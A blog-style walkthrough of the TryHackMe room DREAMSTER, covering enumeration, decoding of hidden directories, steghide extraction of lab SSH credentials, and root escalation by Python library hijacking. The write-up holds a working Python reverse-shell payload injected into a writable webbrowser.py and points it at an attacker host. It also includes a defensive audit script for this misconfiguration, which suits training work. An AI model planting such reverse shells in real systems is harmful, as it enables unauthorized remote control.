TryHackMe | DREAMSTER — Walkthrough

Hack The Universe
8 min read · Jun 12, 2021

Box link: https://tryhackme.com/jr/dreamsterbt

The server protected by rabbit holes

Hacking is like chemistry: it creates a bond between us.

Hey technophiles,
In this article we discuss how to gain root access on the TryHackMe easy room DREAMSTER, a fun and easy room created by rockybai and 7h3h4ckv157. An SSH credential is hidden in the web application, and afterwards we hijack a Python library to compromise the server. So let's dive in.

We start with nmap. The scan results are shown below.

nmap -A -Pn 10.10.42.16
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-11 13:03 IST
Nmap scan report for 10.10.42.16
Host is up (0.65s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Inceptive Agents Area
1111/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 82:e7:23:04:43:cf:8f:cd:39:70:32:8e:7c:f2:cc:ee (RSA)
| 256 d9:25:7a:e4:c8:0d:a2:32:47:5c:bc:cb:0f:b5:f3:c8 (ECDSA)
|_ 256 d7:ee:6e:f8:4c:98:43:c8:ae:94:8e:77:81:97:07:09 (ED25519)
Service Info: OS: Linux; CPE:

result

Ports 80 and 1111 are open.
Port 80: HTTP, Apache httpd 2.4.41
Port 1111: OpenSSH 8.2p1 Ubuntu 4ubuntu0.2

So let's take a quick look at the web page and find out what's going on.

http://Machine-IP:80/

Nothing informative; for the next step we have to inspect the page source. There we can see another direction to take.

source code

Inside the script tag there is a reference to a JavaScript file named terminal.js.

By checking the JS file, we can see a base64-encoded string: L2RyMzRtM3Jz

(Hint: base of the day)

terminal.js

Simply, on the terminal, type: ~# echo "L2RyMzRtM3Jz" | base64 -d

This decodes the base64 (the plaintext of "L2RyMzRtM3Jz" is /dr34m3rs), which is another directory.

/dr34m3rs

The page again raises a question, and as usual we have to dig into the source for a way forward.

By reading the source code, it's crystal clear that the image we saw before (404.png) is stored inside a directory named /f1l3s.

So let's dive into /f1l3s.

Index of /f1l3s

An interesting file, lol.txt, is inside /f1l3s; it contains some numbers. Let's decode them.

lol.txt

If you noticed, the digits only range from 0 to 7, so it's easy to see that this is octal, and we can decode it without any mistake.

Decoded successfully

Following all these steps, we reach a new directory again. It felt like a puzzle game when I tried it at first, but if you are a real CTF enthusiast you'll love this. So let's check the directory ch3ck_1n.

/ch3ck_1n

Visiting the page for the first time, my mind whispered that I had to go through the source again. Shall we?

source code of ch3ck_1n

We got a roadmap from this info leak: by combining the first letters of those words we get the way towards another directory, /drunk3n. Diving into that directory, we can see a file upload form.

/drunk3n

Note: After multiple tries, we didn't get any error or success message. You can either capture the response through Burp and enumerate, or check the page source. Here I'm just going through the source code (that was easy for me), and I was able to find something really interesting.

are you watching closely….??

line number 26 to 48

<?php
if(isset($_FILES['file'])){
    $errors= array();
    $file_name = $_FILES['file']['name'];
    $file_tmp =$_FILES['file']['tmp_name'];
    $file_type=$_FILES['file']['type'];
    $file_ext=strtolower(end(explode('.',$_FILES['file']['name'])));

    // only the .phtml extension passes the check
    $extensions= array("phtml");

    if(in_array($file_ext,$extensions)=== false){
        $errors="Extension not allowed";
    }

    if(empty($errors)==true){
        // the target directory "unknown/" does not exist on the server,
        // so the move never succeeds and nothing is reported back
        move_uploaded_file($file_tmp,"unknown/".$file_name);
        echo "Success";
    }else{
        print_r($errors);
    }

}
?>

Important Turning point

The PHP script simply stores the uploaded file in a directory called "unknown". You can see that $errors is set to "Extension not allowed" when the extension check fails, yet after trying multiple conditions it's clear that no error is ever shown back to us. There are no errors and no success messages, and checking for the directory "unknown", both inside /drunk3n and outside it, gives 404 errors. So we are digging inside the Rabbit 🐇 Hole: the "unknown" directory is probably not present on the server. Now I realized the meaning of the HINT given in the description: "The server protected by rabbit holes". When we do something right, a pathway is created. Unfortunately, a pathway is also created when we do something wrong. We basically build habits this way, both good and bad. So the reason we keep making the same mistakes is that we slip by default back into existing neural pathways.

Insanity is repeating the same mistakes and expecting different results.

From this point I started brute-forcing; you can use dirb's big.txt (which hits the result). The response was 200 for "ztest".

Note: I tried the directory search inside the current directory /drunk3n.

/ztest

Reading the file for_dreamer.txt, I was really confused, but the trailing "==" pointed me towards Base64.

for_dreamer.txt

The Base64 encoding scheme converts arbitrary binary data (text, images, even sound files) into a printable string that can be saved or transported over the network without loss. So now it's easy to decode, right?

Base64 Image Decoder

Decoding it gave me an image, which implied we had to dive somewhere else: the directory named /d1sc0. Visiting the page, I saw that it accepts user input as a query.

/d1sc0

Passing inputs and enumerating the results, you'll quickly see there's nothing there. As usual, let's see what's hidden in the source code.

source code → /d1sc0

Line 9 shows the way ahead: a new directory named /s0ck3t.

/s0ck3t

The only thing left was an image → “dog_boy.jpg”.

dog_boy.jpg

Without dragging it out, straight to the point: it was a steganographic image hiding some data. I'm using steghide to extract the data for further investigation.

steghide extract -sf dog_to_decode.jpg

It asks for a passphrase; I just typed "passphrase" as the passphrase, just like hackers typing password123. I hope that's easy to guess.

extracting

A text file, loot.txt, is extracted from the image.

dear ripper,

i hope the dreamers wont make to here…hope you will be reading this…
with all respect delete ur god damn passowrd..”ripperthegolddicker”….you know the port 1111 will provide communication through ssh…damn youuu..

cheers,
agent root

As a result, we are close to the destination. SSH credentials found!! 🔥😎

Username: ripper

password: ripperthegolddicker

ssh ripper@machine-ip -p 1111

password: ripperthegolddicker

login via ssh

We own the user of the room; now it's time for privilege escalation. sudo -l shows an interesting result: we have sudo permission for a particular file.

User ripper may run the following commands on pawner:
    (root) NOPASSWD: /usr/bin/python3.8 /var/opt/rose/1_2/talk.py

Reading the content of talk.py, we can understand that the Python script launches the Chrome browser; for this purpose the library called webbrowser is imported. The webbrowser module can be used to launch a browser in a platform-independent manner.

/var/opt/rose/1_2/talk.py

We can't edit the contents of talk.py, so to exploit this we need to locate the module file first. We used the locate command to find it.

/usr/lib/python3.8/webbrowser.py

We can edit the contents of /usr/lib/python3.8/webbrowser.py

Privilege Escalation steps (from USER to ROOT)

Python Library Hijacking

We ran sudo -l to see which scripts or binaries we can run with elevated access, and saw that we can use python3.8 to run talk.py, which imports the module webbrowser. We used the locate command to find the module and found it inside /usr/lib/python3.8. Next, we checked the permissions on the module and found that it is writable by the user ripper (we can edit the contents of /usr/lib/python3.8/webbrowser.py).
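As an added example (not from the original post or the room), here is the check a defender would run for exactly this misconfiguration: list the modules a sudo-allowed script imports, resolve each to its file the way the interpreter would, and flag any file a non-root user can modify. The talk.py script and the lib directory built in demo() are constructed stand-ins for the box's files.

```python
import ast
import importlib.machinery
import os
import pathlib
import tempfile


def imported_modules(script_path):
    """Top-level module names the script imports, found statically with ast."""
    with open(script_path, encoding="utf-8") as fh:
        tree = ast.parse(fh.read(), filename=script_path)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def is_writable_by_non_root(path):
    """True if a non-root account owns the file or group/other may write it."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & 0o022)  # 0o022: group/other write


def audit_script(script_path, search_path):
    """Map each import to its file on disk when a non-root user could modify it."""
    base = [os.path.dirname(os.path.abspath(script_path))] + list(search_path)  # script dir first, like the interpreter
    findings = {}
    for name in imported_modules(script_path):
        spec = importlib.machinery.PathFinder.find_spec(name, base)
        if spec is None or not spec.origin or not os.path.isfile(spec.origin):
            continue  # built-in or frozen modules have no file to overwrite
        if is_writable_by_non_root(spec.origin):
            findings[name] = spec.origin
    return findings


def demo():
    """Constructed scenario: a talk.py-like script whose webbrowser.py is world-writable."""
    root = pathlib.Path(tempfile.mkdtemp())
    lib = root / "lib"  # stands in for /usr/lib/python3.8
    lib.mkdir()
    module = lib / "webbrowser.py"
    module.write_text("def open(url):\n    return url\n")
    module.chmod(0o666)  # the weak permission that enables the hijack
    script = root / "talk.py"
    script.write_text("import webbrowser\nwebbrowser.open('http://example.test')\n")
    return audit_script(str(script), [str(lib)])
```

Run audit_script against a real sudo-allowed script with sys.path as the search path; any module it reports is one that should be root-owned and mode 644 or stricter.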

vim /usr/lib/python3.8/webbrowser.py

We use vim to open the module file and add a Python reverse shell inside the function that talk.py calls. We saw earlier that it opens a web page in the browser, so it will be using the open function. Hence we add the reverse shell code as depicted below.

injected in line 80

Payload is given below

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("your-IP",PORT));os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1);os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")

After editing the module file, we save and close the editor. Back on the attacking machine, we open a Netcat listener on the port used in the reverse shell script, then return to the shell as the ripper user and execute talk.py with sudo as shown in the image.

Machine compromised..!!

Machine is pwned…!! ~#whoami

→Super User

→ ROOT
